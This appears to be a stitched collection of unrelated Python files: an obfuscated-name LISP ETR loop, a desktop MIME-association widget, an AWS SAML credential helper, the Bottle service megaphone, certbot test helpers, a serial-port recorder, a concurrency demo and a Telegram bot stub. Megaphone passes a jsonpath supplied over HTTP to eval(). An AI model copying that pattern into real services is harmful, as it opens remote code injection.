if ( OoOiII11IiIi == "command" ) :
if ( OO0 . find ( "learn%" ) != - 1 ) :
oo0O ( OO0 )
elif ( OO0 . find ( "nonce%" ) != - 1 ) :
iII1ii11III ( OO0 )
elif ( OO0 . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( OO0 )
elif ( OO0 . find ( "rtr%" ) != - 1 ) :
OO0OO00ooO0 ( OO0 )
elif ( OO0 . find ( "stats%" ) != - 1 ) :
OO0 = OO0 . split ( "%" ) [ - 1 ]
lisp . lisp_process_data_plane_decap_stats ( OO0 , None )
else :
lispconfig . lisp_process_command ( I11 ,
OoOiII11IiIi , OO0 , "lisp-etr" , [ Oo00O ] )
if 54 - 54: oOo0O0Ooo . OoooooooOO
elif ( OoOiII11IiIi == "api" ) :
lisp . lisp_process_api ( "lisp-etr" , I11 , OO0 )
else :
if ( lisp . lisp_is_rloc_probe_request ( OO0 [ 0 ] ) ) :
lisp . lprint ( "ETR ignoring RLOC-probe request, using pcap" )
continue
if 36 - 36: iiiiIi11i / II111iiii * oooO0oo0oOOOO % oOoO0oo0OOOo
lisp . lisp_parse_packet ( Oo0o0000o0o0 , OO0 , II1iIi11 , i11i11II11i )
if 31 - 31: II111iiii + II11iiII - OoooooooOO . OoOO0ooOOoo0O
if 28 - 28: o0000oOoOoO0o . oOoO0oo0OOOo
if 77 - 77: oOoO0oo0OOOo % II111iiii
if 81 - 81: oOo0O0Ooo % o0000oOoOoO0o / O0 * iIii1I11I1II1 % oooO0oo0oOOOO . oo
oOOoOO0O00o ( )
lisp . lisp_print_banner ( "ETR normal exit" )
exit ( 0 )
if 90 - 90: Ooo00oOo00o
if 44 - 44: Ooo00oOo00o / oOoO0oo0OOOo . OoO0O00 + oOo0O0Ooo
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
association_item.py | # -*- coding: future_fstrings -*-
"""
This module defines a single AssociationItem in the AssociationsPanel.
"""
from threading import Thread
from PySide2.QtWidgets import QComboBox
from xdgprefs.gui.mime_item import MimeTypeItem
class AssociationItem(MimeTypeItem):
def __init__(self, mime_type, apps, main_window, listview):
MimeTypeItem.__init__(self, mime_type, listview)
self.apps = apps
self.main_window = main_window
self.selector = QComboBox()
self.selector.addItems(self.apps)
self.selector.currentTextChanged.connect(self._on_selected)
self.hbox.addWidget(self.selector, 2)
def _on_selected(self, _):
mime = self.mime_type.identifier
app = self.selector.currentText()
self.main_window.status.showMessage(f'Setting {mime} to {app}...')
def run():
success = self.main_window.assocdb.set_app_for_mimetype(mime, app)
if success:
msg = f'{app} was successfully set to open {mime}.'
else:
msg = f'Could not set {app} to open {mime}, please check ' \
f'the logs!'
self.main_window.status.showMessage(msg)
t = Thread(target=run)
t.start()
def __hash__(self):
return hash(self.mime_type)
|
amazon.py | #!/usr/bin/env python
import base64
import os
import boto3
from datetime import datetime
from threading import Thread
from botocore.exceptions import ProfileNotFound
from lxml import etree
from aws_google_auth.google import ExpectedGoogleException
class Amazon:
def __init__(self, config, saml_xml):
self.config = config
self.saml_xml = saml_xml
self.__token = None
@property
def sts_client(self):
try:
profile = os.environ.get('AWS_PROFILE')
if profile is not None:
del os.environ['AWS_PROFILE']
client = boto3.client('sts', region_name=self.config.region)
if profile is not None:
os.environ['AWS_PROFILE'] = profile
return client
except ProfileNotFound as ex:
raise ExpectedGoogleException("Error : {}.".format(ex))
@property
def base64_encoded_saml(self):
return base64.b64encode(self.saml_xml).decode("utf-8")
@property
def token(self):
if self.__token is None:
self.__token = self.sts_client.assume_role_with_saml(
RoleArn=self.config.role_arn,
PrincipalArn=self.config.provider,
SAMLAssertion=self.base64_encoded_saml,
DurationSeconds=self.config.duration)
return self.__token
@property
def access_key_id(self):
return self.token['Credentials']['AccessKeyId']
@property
def secret_access_key(self):
return self.token['Credentials']['SecretAccessKey']
@property
def session_token(self):
return self.token['Credentials']['SessionToken']
@property
def expiration(self):
return self.token['Credentials']['Expiration']
def print_export_line(self):
export_template = "export AWS_ACCESS_KEY_ID='{}' AWS_SECRET_ACCESS_KEY='{}' AWS_SESSION_TOKEN='{}' AWS_SESSION_EXPIRATION='{}'"
formatted = export_template.format(
self.access_key_id,
self.secret_access_key,
self.session_token,
self.expiration.strftime('%Y-%m-%dT%H:%M:%S%z'))
print(formatted)
@property
def roles(self):
doc = etree.fromstring(self.saml_xml)
roles = {}
for x in doc.xpath('//*[@Name = "https://aws.amazon.com/SAML/Attributes/Role"]//text()'):
if "arn:aws:iam:" in x:
res = x.split(',')
roles[res[0]] = res[1]
return roles
def resolve_aws_aliases(self, roles):
def resolve_aws_alias(role, principal, aws_dict):
session = boto3.session.Session(region_name=self.config.region)
sts = session.client('sts')
saml = sts.assume_role_with_saml(RoleArn=role,
PrincipalArn=principal,
SAMLAssertion=self.base64_encoded_saml)
iam = session.client('iam',
aws_access_key_id=saml['Credentials']['AccessKeyId'],
aws_secret_access_key=saml['Credentials']['SecretAccessKey'],
aws_session_token=saml['Credentials']['SessionToken'])
try:
response = iam.list_account_aliases()
account_alias = response['AccountAliases'][0]
aws_dict[role.split(':')[4]] = account_alias
except:
sts = session.client('sts',
aws_access_key_id=saml['Credentials']['AccessKeyId'],
aws_secret_access_key=saml['Credentials']['SecretAccessKey'],
aws_session_token=saml['Credentials']['SessionToken'])
account_id = sts.get_caller_identity().get('Account')
aws_dict[role.split(':')[4]] = '{}'.format(account_id)
threads = []
aws_id_alias = {}
for number, (role, principal) in enumerate(roles.items()):
t = Thread(target=resolve_aws_alias, args=(role, principal, aws_id_alias))
t.start()
threads.append(t)
for t in threads:
t.join()
return aws_id_alias
@staticmethod
def is_valid_saml_assertion(saml_xml):
if saml_xml is None:
return False
try:
doc = etree.fromstring(saml_xml)
conditions = list(doc.iter(tag='{urn:oasis:names:tc:SAML:2.0:assertion}Conditions'))
not_before_str = conditions[0].get('NotBefore')
not_on_or_after_str = conditions[0].get('NotOnOrAfter')
now = datetime.utcnow()
not_before = datetime.strptime(not_before_str, "%Y-%m-%dT%H:%M:%S.%fZ")
not_on_or_after = datetime.strptime(not_on_or_after_str, "%Y-%m-%dT%H:%M:%S.%fZ")
if not_before <= now < not_on_or_after:
return True
else:
return False
except Exception:
return False
|
megaphone.py | #!/usr/bin/env python
"""Megaphone is an alerting consolidation service."""
import json
import sys
import os
import re
from bottle import Bottle
import time
import urllib2
import shutil
import bottle
from ConfigParser import SafeConfigParser
import logging
import multiprocessing
logging.basicConfig()
app = Bottle()
_basedir = os.path.abspath(os.path.dirname(__file__))
config = SafeConfigParser()
try:
config.read('%s/megaphone.conf' % _basedir)
DEBUG = config.getboolean('settings', 'DEBUG')
QUIET = config.getboolean('settings', 'QUIET')
CACHEDIR = config.get('settings', 'CACHEDIR')
CACHEFILE = config.get('settings', 'CACHEFILE')
WSGISERVER = config.get('settings', 'WSGISERVER')
CACHE = "%s/%s" % (CACHEDIR, CACHEFILE)
LISTEN = config.get('settings', 'LISTEN')
PORT = config.get('settings', 'PORT')
TIMEOUT = float(config.get('settings', 'TIMEOUT'))
except:
print "INFO: unable to find config file, skipping"
if "MEGAPHONE_DEBUG" in os.environ:
DEBUG = os.environ["MEGAPHONE_DEBUG"]
if "MEGAPHONE_QUIET" in os.environ:
QUIET = os.environ["MEGAPHONE_QUIET"]
if "MEGAPHONE_WSGISERVER" in os.environ:
WSGISERVER = os.environ["MEGAPHONE_WSGISERVER"]
if "MEGAPHONE_CACHE" in os.environ:
CACHE = os.environ["MEGAPHONE_CACHE"]
if "MEGAPHONE_LISTEN" in os.environ:
LISTEN = os.environ["MEGAPHONE_LISTEN"]
if "MEGAPHONE_PORT" in os.environ:
PORT = os.environ["MEGAPHONE_PORT"]
if "MEGAPHONE_TIMEOUT" in os.environ:
TIMEOUT = os.environ["MEGAPHONE_TIMEOUT"]
try:
DEBUG
except:
DEBUG = False
try:
QUIET
except:
QUIET = True
try:
WSGISERVER
except:
WSGISERVER = "default"
try:
LISTEN
except:
LISTEN = "0.0.0.0"
try:
CACHE
except:
CACHE = "/tmp/megaphone.json"
try:
PORT
except:
PORT = "18001"
try:
TIMEOUT
except:
TIMEOUT = 10
def bug(msg):
"""Print debug output."""
if DEBUG:
print "DEBUG: %s" % msg
class MyException(Exception):
"""Support unittesting."""
pass
ts = time.strftime('%Y-%m-%dT%H:%M:%S%Z', time.localtime())
# Change working directory so relative paths (and template lookup) work again
root = os.path.join(os.path.dirname(__file__))
sys.path.insert(0, root)
if os.path.isfile(CACHE):
bug("CACHE: %s" % CACHE)
with open(CACHE) as data_file:
checks = json.load(data_file)
else:
checks = {}
# we shouldn't write to tmp by default because our megaphone.json could get deleted by tmpwatch
if CACHE == "/tmp/megaphone.json":
print "WARNING: cache set to %s, could get clobbered by tmpwatch!" % CACHE
def writecache(data):
try:
if os.path.isfile(CACHE):
backup = "%s.backup" % CACHE
shutil.copyfile(CACHE, backup)
with open(CACHE, 'w') as outfile:
json.dump(data, outfile)
except:
# it's bad news if we can't create a cache file to reload on restart,
# throw an error in megaphone!
print "ERROR: cache creation failed!"
checks['--global'] = "ERROR: cache creation failed!"
writecache(checks)
# generate nested python dictionaries, copied from here:
# http://stackoverflow.com/questions/635483/what-is-the-best-way-to-implement-nested-dictionaries-in-python
class AutoVivification(dict):
"""Implementation of perl's autovivification feature."""
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
value = self[item] = type(self)()
return value
# read a file
def readfile(fname):
try:
f = open(fname, 'r')
o = f.read()
return re.sub(r'\0', ' ', o)
f.close()
except:
msg = "Critical: reading %s failed!" % fname
return msg
# read a megaphone compatible status url and return the object
def readstatus(name,url,q):
bug("now in readstatus")
result = {}
validstatus = ["OK", "Unknown", "Warning", "Critical"]
# this is to support status somewhere other than 'status' under the root of a service
# {"id": "ok2_status", "url": {"addr": "http://localhost:18999/status", "jsonpath": "megaphone/status"}}
if isinstance(url, dict):
bug("url is a dictionary")
data = AutoVivification()
if 'addr' not in url:
mymsg = "ERROR: couldn't find addr in url, nothing to check"
bug(mymsg)
data['status'] = "Critical"
data['message'] = mymsg
else:
if 'jsonpath' in url:
bug("parsing jsonpath and addr in url: jsonpath: %s, addr: %s" % (url['jsonpath'],url['addr']))
try:
tdata = json.load(urllib2.urlopen(url['addr'], timeout = TIMEOUT))
v = "tdata"
for i in url['jsonpath'].split("/"):
bug("i: %s" % i)
if i:
v += "['%s']" % i
bug("eval type:")
if DEBUG:
print type(eval(v))
print type(eval(v).encode('ascii','ignore'))
data['status'] = eval(v)
data['date'] = ts
msg = "Status from path %s: %s" % (url['jsonpath'], data['status'])
bug(msg)
data['message'] = msg
except:
msg = "error collecting results from addr: %s, jsonpath: %s" % (url['addr'],url['jsonpath'])
bug(msg)
data['status'] = "Critical"
data['date'] = ts
data['message'] = msg
else:
bug("no jsonpath detected in url, using only addr path")
try:
data = json.load(urllib2.urlopen(url['addr'], timeout = TIMEOUT))
except:
msg = "timeout connecting to %s" % (url['addr'])
bug(msg)
data['status'] = "Critical"
data['date'] = ts
data['message'] = msg
if 'statusoverride' in url:
bug("statusoverride detected in url")
if url['statusoverride'] not in validstatus:
data['status'] = "Critical"
data['message'] = "ERROR: invalid status '%s' written to statusoverride!" % url['statusoverride']
else:
data['status'] = url['statusoverride']
data['message'] = "NOTICE: statusoverride used!"
else:
bug("url object isn't a dictionary, processing normally")
try:
data = json.load(urllib2.urlopen(url, timeout = TIMEOUT))
except:
data = AutoVivification()
msg = "timeout connecting to %s" % (url)
bug(msg)
data['status'] = "Critical"
data['date'] = ts
data['message'] = msg
if "status" not in data.keys():
data['status'] = "Critical"
data['message'] = "No status was found on given path!"
if data["status"] not in validstatus:
data['status'] = "Critical"
data['message'] = "ERROR: status value '%s' not valid!" % data["status"]
bug("Data:")
if DEBUG:
print data
result[name] = data
if DEBUG:
print result
print type(name)
print type(result)
if q:
q.put(result)
else:
return data
def returnmsg(x,st):
if 'message' not in x.keys():
return "Detected %s state [no message specified]" % st
else:
return x['message']
bug("message: %s" % mymsg)
def getallstatus():
bug("Checks:")
if DEBUG:
print checks
data = AutoVivification()
# setting a global override. If there is a check with the id '--global',
# only respect that. Always return Critical with a message of whatever is
# in the url object
if "--global" in checks.keys():
bug("Found a global valuse in keys!")
data['status'] = "Critical"
data['message'] = checks['--global']
data['date'] = ts
return data
# if there's no global override, parse the rest of the checks.
else:
# trying to conform to current monitoring status guidelines
# http://nagiosplug.sourceforge.net/developer-guidelines.html#PLUGOUTPUT
statusc = {
"Warning": 0,
"Critical": 0,
"Unknown": 0,
"OK": 0,
}
E = 0
msg = ""
# run all the checks in parallel
q = multiprocessing.Queue()
jobs = [multiprocessing.Process(target=readstatus, args=(i,checks[i],q,)) for i in checks.keys()]
for job in jobs: job.start()
for job in jobs: job.join()
results = [q.get() for i in checks.keys()]
bug("Results:")
print results
for y in results:
i, x = y.popitem()
# for all checks we're monitoring, capture the state and the message
# figure out something to do with date testing
# like throw an error if current date is > 5min from returned date
bug("checking %s" % i)
bug("check status response:")
if DEBUG:
print x
stattypes = ["Warning", "Critical", "OK"]
if x['status'] in stattypes:
bug("Detected %s status" % x['status'])
mymsg = returnmsg(x,x['status'])
bug("mymsg: %s" % mymsg)
statusc[x['status']] = statusc[x['status']] + 1
if x['status'] != "OK":
msg += "%s:%s:%s|" % (i, x['status'], mymsg)
else:
mymsg = returnmsg(x,"Unknown")
# things aren't Warning, Critical, or OK so something else is going on
statusc['Unknown'] = statusc['Unknown'] + 1
msg += "%s:%s:%s|" % (i, x['status'], mymsg)
bug("All checks are checked!")
# set the status to the most critical value in the order: Unknown, Warning, Critical
# i.e. if WARNING is the worst issue, i present that, but if ERROR and
# WARNING are both present use ERROR
bug("finished all checks. Aggregating")
if statusc['Unknown'] > 0:
data['status'] = "Unknown"
E = 1
bug("Setting state to Unknown")
if statusc['Warning'] > 0:
data['status'] = "Warning"
E = 1
bug("Setting state to Warning")
if statusc['Critical'] > 0:
data['status'] = "Critical"
E = 1
bug("Setting state to Critical")
# trim the value of msg since we're appending and adding ';' at the end for errors
bug("E: %s" % str(E))
if E > 0:
data['message'] = msg[:-1]
bug("final message - %s" % msg[:-1])
else:
if len(checks.keys()) > 0:
bug("All checks are OK!")
# we didn't find any error states, so we're OK
data['status'] = "OK"
data['message'] = "Everything is OK!"
else:
data['status'] = "Unknown"
data['message'] = "No checks are registered!"
bug("No checks are registered!")
bug("adding timestamp")
data['date'] = ts
bug("results are in:")
if DEBUG:
print data
return data
# list all megaphone checks
@app.get('/checks')
def list():
data = AutoVivification()
return checks
# add a check: {"id": "ok_status", "url": "http://localhost:18999/status"}
@app.post('/checks')
def add_submit():
data = bottle.request.body.readline()
if not data:
app.abort(400, 'No data received')
entity = json.loads(data)
if 'id' not in entity:
app.abort(400, 'No id specified')
try:
checks[entity["id"]] = entity["url"]
writecache(checks)
except:
app.abort(400, "Error adding new check!")
# delete a check: {"id": "ok_status"}
@app.delete('/checks/:s')
def delcheck(s):
try:
del checks[s]
writecache(checks)
except:
app.abort(400, "Error deleting check!")
# proxy the response of a status url megaphone is checking
@app.get('/checks/:s')
def checkshow(s):
if s not in checks.keys():
return "Sorry, no check %s registered!" % s
else:
if isinstance(checks[s], dict):
if 'addr' not in checks[s]:
return "Sorry, can't find a valid endpoint in your check!"
else:
try:
res = json.load(urllib2.urlopen(checks[s]['addr'], timeout = TIMEOUT))
if 'statusoverride' in checks[s]:
res['status'] = checks[s]['statusoverride']
res['message'] = "NOTICE: statusoverride used!"
return res
except:
return "Error connecting to: %s" % checks[s]['addr']
else:
try:
return json.load(urllib2.urlopen(checks[s], timeout = TIMEOUT))
except:
return "Error connecting to: %s" % checks[s]['addr']
# generate the main status output
@app.get('/')
def status():
return getallstatus()
if __name__ == '__main__':
try:
if WSGISERVER != 'default':
app.run(host=LISTEN, port=PORT, debug=DEBUG, quiet=QUIET, server=WSGISERVER)
else:
app.run(host=LISTEN, port=PORT, debug=DEBUG, quiet=QUIET)
except KeyboardInterrupt:
sys.exit("Aborted by Ctrl-C!")
|
util.py | """Test utilities.
.. warning:: This module is not part of the public API.
"""
import logging
import multiprocessing
import os
import pkg_resources
import shutil
import stat
import tempfile
import unittest
import sys
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import mock
import OpenSSL
import josepy as jose
import six
from six.moves import reload_module # pylint: disable=import-error
from certbot import constants
from certbot import interfaces
from certbot import storage
from certbot import util
from certbot import configuration
from certbot.display import util as display_util
def vector_path(*names):
"""Path to a test vector."""
return pkg_resources.resource_filename(
__name__, os.path.join('testdata', *names))
def load_vector(*names):
"""Load contents of a test vector."""
# luckily, resource_string opens file in binary mode
data = pkg_resources.resource_string(
__name__, os.path.join('testdata', *names))
# Try at most to convert CRLF to LF when data is text
try:
return data.decode().replace('\r\n', '\n').encode()
except ValueError:
# Failed to process the file with standard encoding.
# Most likely not a text file, return its bytes untouched.
return data
def _guess_loader(filename, loader_pem, loader_der):
_, ext = os.path.splitext(filename)
if ext.lower() == '.pem':
return loader_pem
elif ext.lower() == '.der':
return loader_der
else: # pragma: no cover
raise ValueError("Loader could not be recognized based on extension")
def load_cert(*names):
"""Load certificate."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate(loader, load_vector(*names))
def load_csr(*names):
"""Load certificate request."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate_request(loader, load_vector(*names))
def load_comparable_csr(*names):
"""Load ComparableX509 certificate request."""
return jose.ComparableX509(load_csr(*names))
def load_rsa_private_key(*names):
"""Load RSA private key."""
loader = _guess_loader(names[-1], serialization.load_pem_private_key,
serialization.load_der_private_key)
return jose.ComparableRSAKey(loader(
load_vector(*names), password=None, backend=default_backend()))
def load_pyopenssl_private_key(*names):
"""Load pyOpenSSL private key."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_privatekey(loader, load_vector(*names))
def skip_unless(condition, reason): # pragma: no cover
"""Skip tests unless a condition holds.
This implements the basic functionality of unittest.skipUnless
which is only available on Python 2.7+.
:param bool condition: If ``False``, the test will be skipped
:param str reason: the reason for skipping the test
:rtype: callable
:returns: decorator that hides tests unless condition is ``True``
"""
if hasattr(unittest, "skipUnless"):
return unittest.skipUnless(condition, reason)
elif condition:
return lambda cls: cls
else:
return lambda cls: None
def make_lineage(config_dir, testfile):
"""Creates a lineage defined by testfile.
This creates the archive, live, and renewal directories if
necessary and creates a simple lineage.
:param str config_dir: path to the configuration directory
:param str testfile: configuration file to base the lineage on
:returns: path to the renewal conf file for the created lineage
:rtype: str
"""
lineage_name = testfile[:-len('.conf')]
conf_dir = os.path.join(
config_dir, constants.RENEWAL_CONFIGS_DIR)
archive_dir = os.path.join(
config_dir, constants.ARCHIVE_DIR, lineage_name)
live_dir = os.path.join(
config_dir, constants.LIVE_DIR, lineage_name)
for directory in (archive_dir, conf_dir, live_dir,):
if not os.path.exists(directory):
os.makedirs(directory)
sample_archive = vector_path('sample-archive')
for kind in os.listdir(sample_archive):
shutil.copyfile(os.path.join(sample_archive, kind),
os.path.join(archive_dir, kind))
for kind in storage.ALL_FOUR:
os.symlink(os.path.join(archive_dir, '{0}1.pem'.format(kind)),
os.path.join(live_dir, '{0}.pem'.format(kind)))
conf_path = os.path.join(config_dir, conf_dir, testfile)
with open(vector_path(testfile)) as src:
with open(conf_path, 'w') as dst:
dst.writelines(
line.replace('MAGICDIR', config_dir) for line in src)
return conf_path
def patch_get_utility(target='zope.component.getUtility'):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
:param str target: path to patch
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
return mock.patch(target, new_callable=_create_get_utility_mock)
def patch_get_utility_with_stdout(target='zope.component.getUtility',
stdout=None):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it also
also asserts that methods are called with valid arguments.
The `message` argument passed to the IDisplay methods is passed to
stdout's write method.
:param str target: path to patch
:param object stdout: object to write standard output to; it is
expected to have a `write` method
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
stdout = stdout if stdout else six.StringIO()
freezable_mock = _create_get_utility_mock_with_stdout(stdout)
return mock.patch(target, new=freezable_mock)
class FreezableMock(object):
"""Mock object with the ability to freeze attributes.
This class works like a regular mock.MagicMock object, except
attributes and behavior set before the object is frozen cannot
be changed during tests.
If a func argument is provided to the constructor, this function
is called first when an instance of FreezableMock is called,
followed by the usual behavior defined by MagicMock. The return
value of func is ignored.
"""
def __init__(self, frozen=False, func=None, return_value=mock.sentinel.DEFAULT):
self._frozen_set = set() if frozen else set(('freeze',))
self._func = func
self._mock = mock.MagicMock()
if return_value != mock.sentinel.DEFAULT:
self.return_value = return_value
self._frozen = frozen
def freeze(self):
"""Freeze object preventing further changes."""
self._frozen = True
def __call__(self, *args, **kwargs):
if self._func is not None:
self._func(*args, **kwargs)
return self._mock(*args, **kwargs)
def __getattribute__(self, name):
if name == '_frozen':
try:
return object.__getattribute__(self, name)
except AttributeError:
return False
elif name in ('return_value', 'side_effect',):
return getattr(object.__getattribute__(self, '_mock'), name)
elif name == '_frozen_set' or name in self._frozen_set:
return object.__getattribute__(self, name)
else:
return getattr(object.__getattribute__(self, '_mock'), name)
def __setattr__(self, name, value):
""" Before it is frozen, attributes are set on the FreezableMock
instance and added to the _frozen_set. Attributes in the _frozen_set
cannot be changed after the FreezableMock is frozen. In this case,
they are set on the underlying _mock.
In cases of return_value and side_effect, these attributes are always
passed through to the instance's _mock and added to the _frozen_set
before the object is frozen.
"""
if self._frozen:
if name in self._frozen_set:
raise AttributeError('Cannot change frozen attribute ' + name)
else:
return setattr(self._mock, name, value)
if name != '_frozen_set':
self._frozen_set.add(name)
if name in ('return_value', 'side_effect'):
return setattr(self._mock, name, value)
else:
return object.__setattr__(self, name, value)
def _create_get_utility_mock():
display = FreezableMock()
for name in interfaces.IDisplay.names(): # pylint: disable=no-member
if name != 'notification':
frozen_mock = FreezableMock(frozen=True, func=_assert_valid_call)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _create_get_utility_mock_with_stdout(stdout):
def _write_msg(message, *unused_args, **unused_kwargs):
"""Write to message to stdout.
"""
if message:
stdout.write(message)
def mock_method(*args, **kwargs):
"""
Mock function for IDisplay methods.
"""
_assert_valid_call(args, kwargs)
_write_msg(*args, **kwargs)
display = FreezableMock()
for name in interfaces.IDisplay.names(): # pylint: disable=no-member
if name == 'notification':
frozen_mock = FreezableMock(frozen=True,
func=_write_msg)
setattr(display, name, frozen_mock)
else:
frozen_mock = FreezableMock(frozen=True,
func=mock_method)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _assert_valid_call(*args, **kwargs):
assert_args = [args[0] if args else kwargs['message']]
assert_kwargs = {}
assert_kwargs['default'] = kwargs.get('default', None)
assert_kwargs['cli_flag'] = kwargs.get('cli_flag', None)
assert_kwargs['force_interactive'] = kwargs.get('force_interactive', False)
# pylint: disable=star-args
display_util.assert_valid_call(*assert_args, **assert_kwargs)
class TempDirTestCase(unittest.TestCase):
"""Base test class which sets up and tears down a temporary directory"""
def setUp(self):
"""Execute before test"""
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
"""Execute after test"""
# Cleanup opened resources after a test. This is usually done through atexit handlers in
# Certbot, but during tests, atexit will not run registered functions before tearDown is
# called and instead will run them right before the entire test process exits.
# It is a problem on Windows, that does not accept to clean resources before closing them.
logging.shutdown()
util._release_locks() # pylint: disable=protected-access
def handle_rw_files(_, path, __):
"""Handle read-only files, that will fail to be removed on Windows."""
os.chmod(path, stat.S_IWRITE)
os.remove(path)
shutil.rmtree(self.tempdir, onerror=handle_rw_files)
class ConfigTestCase(TempDirTestCase):
"""Test class which sets up a NamespaceConfig object."""
def setUp(self):
super(ConfigTestCase, self).setUp()
self.config = configuration.NamespaceConfig(
mock.MagicMock(**constants.CLI_DEFAULTS)
)
self.config.verb = "certonly"
self.config.config_dir = os.path.join(self.tempdir, 'config')
self.config.work_dir = os.path.join(self.tempdir, 'work')
self.config.logs_dir = os.path.join(self.tempdir, 'logs')
self.config.cert_path = constants.CLI_DEFAULTS['auth_cert_path']
self.config.fullchain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.chain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.server = "https://example.com"
def lock_and_call(func, lock_path):
"""Grab a lock for lock_path and call func.
:param callable func: object to call after acquiring the lock
:param str lock_path: path to file or directory to lock
"""
# Reload module to reset internal _LOCKS dictionary
reload_module(util)
# start child and wait for it to grab the lock
cv = multiprocessing.Condition()
cv.acquire()
child_args = (cv, lock_path,)
child = multiprocessing.Process(target=hold_lock, args=child_args)
child.start()
cv.wait()
# call func and terminate the child
func()
cv.notify()
cv.release()
child.join()
assert child.exitcode == 0
def hold_lock(cv, lock_path): # pragma: no cover
"""Acquire a file lock at lock_path and wait to release it.
:param multiprocessing.Condition cv: condition for synchronization
:param str lock_path: path to the file lock
"""
from certbot import lock
if os.path.isdir(lock_path):
my_lock = lock.lock_dir(lock_path)
else:
my_lock = lock.LockFile(lock_path)
cv.acquire()
cv.notify()
cv.wait()
my_lock.release()
def skip_on_windows(reason):
"""Decorator to skip permanently a test on Windows. A reason is required."""
def wrapper(function):
"""Wrapped version"""
return unittest.skipIf(sys.platform == 'win32', reason)(function)
return wrapper
def broken_on_windows(function):
"""Decorator to skip temporarily a broken test on Windows."""
reason = 'Test is broken and ignored on windows but should be fixed.'
return unittest.skipIf(
sys.platform == 'win32'
and os.environ.get('SKIP_BROKEN_TESTS_ON_WINDOWS', 'true') == 'true',
reason)(function)
def temp_join(path):
"""
Return the given path joined to the tempdir path for the current platform
Eg.: 'cert' => /tmp/cert (Linux) or 'C:\\Users\\currentuser\\AppData\\Temp\\cert' (Windows)
"""
return os.path.join(tempfile.gettempdir(), path)
|
create_test_data_file_from_bt.py |
import serial
import time
import platform
import csv
import threading
import zephyr.protocol
import zephyr.message
def callback(x):
print x
def reading_thread(protocol):
start_time = time.time()
while time.time() < start_time + 120:
protocol.read_and_handle_byte()
def create_data_files(input_definitions):
threads = []
try:
for serial_i, (serial_port, enable_channels) in enumerate(input_definitions):
payload_parser = zephyr.message.MessagePayloadParser([callback])
ser = serial.Serial(serial_port)
protocol = zephyr.protocol.BioHarnessProtocol(ser, payload_parser.handle_message, "../test_data/120-second-bt-stream-%d" % serial_i)
if enable_channels:
protocol.enable_periodic_packets()
thread = threading.Thread(target=reading_thread, args=(protocol,))
threads.append(thread)
thread.start()
finally:
for thread in threads:
thread.join()
def main():
create_data_files([(29, False), (30, True)])
if __name__ == "__main__":
main()
|
concurren-futures.py | from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor
import multiprocessing
from multiprocessing.pool import ThreadPool
import threading
import time
def bar(i=0):
if i == 0:
raise ValueError("bar raise")
return i ** 2
def main_Thread():
thread = threading.Thread(target=bar)
thread.start()
thread.join()
raise RuntimeError("Exception not caught")
def main_ThreadPool():
p = ThreadPool(4)
for i in p.map(bar, xrange(4)):
print i
raise RuntimeError("Exception not caught")
def main_ThreadPoolExecutorMap():
with ThreadPoolExecutor(4) as ex:
for i in ex.map(bar, xrange(4)):
print i
raise RuntimeError("Exception not caught")
def main_ThreadPoolExecutorSubmit():
with ThreadPoolExecutor(4) as ex:
s = ex.submit(bar)
print s.result()
raise RuntimeError("Exception not caught")
def main_Process():
thread = multiprocessing.Process(target=bar)
thread.start()
thread.join()
raise RuntimeError("Exception not caught")
def main_ProcessPool():
p = multiprocessing.Pool(4)
for i in p.map(bar, xrange(4)):
print i
raise RuntimeError("Exception not caught")
def main_ProcessPoolExecutorMap():
with ProcessPoolExecutor(4) as ex:
for i in ex.map(bar, xrange(4)):
print i
raise RuntimeError("Exception not caught")
def main_ProcessPoolExecutorSubmit():
with ProcessPoolExecutor(4) as ex:
s = ex.submit(bar, 0)
print s.result()
raise RuntimeError("Exception not caught")
def run(fun):
ac = threading.active_count()
try:
fun()
except RuntimeError:
print fun.__name__, "[NOT raised]"
except ValueError:
print fun.__name__, "[RAISED]"
time.sleep(1)
print "Zombie thread:", threading.active_count() - ac
if __name__ == '__main__':
run(main_Thread)
run(main_ThreadPool)
run(main_ThreadPoolExecutorMap)
run(main_ThreadPoolExecutorSubmit)
run(main_Process)
run(main_ProcessPool)
run(main_ProcessPoolExecutorMap)
run(main_ProcessPoolExecutorSubmit)
|
app.py | import logging
import helper
import json
from datetime import datetime, timedelta
import os
import sys
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore
from telegram import InlineKeyboardButton, InlineKeyboardMarkup
from queue import Queue
from telegram import ReplyKeyboardRemove
from telegram import ReplyKeyboardMarkup
from threading import Thread
from telegram import ParseMode
from telegram import Bot
from telegram.ext import Dispatcher, CommandHandler, ConversationHandler, MessageHandler, RegexHandler, Updater,Filters,CallbackQueryHandler
from configparser import ConfigParser
import bs4 as bs
import html5lib
import time
import urllib.error
import urllib.request
from urllib import parse
import sqlite3
import random
from xlsxwriter.workbook import Workbook
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger(__name__)
config = ConfigParser()
config.read('config.ini')
TOKEN = config.get('telegram','bot_token')
HACKERRANK_API_KEY = config.get('hackerrank','api_key')
CLIST_USER_NAME = config.get('clist','username')
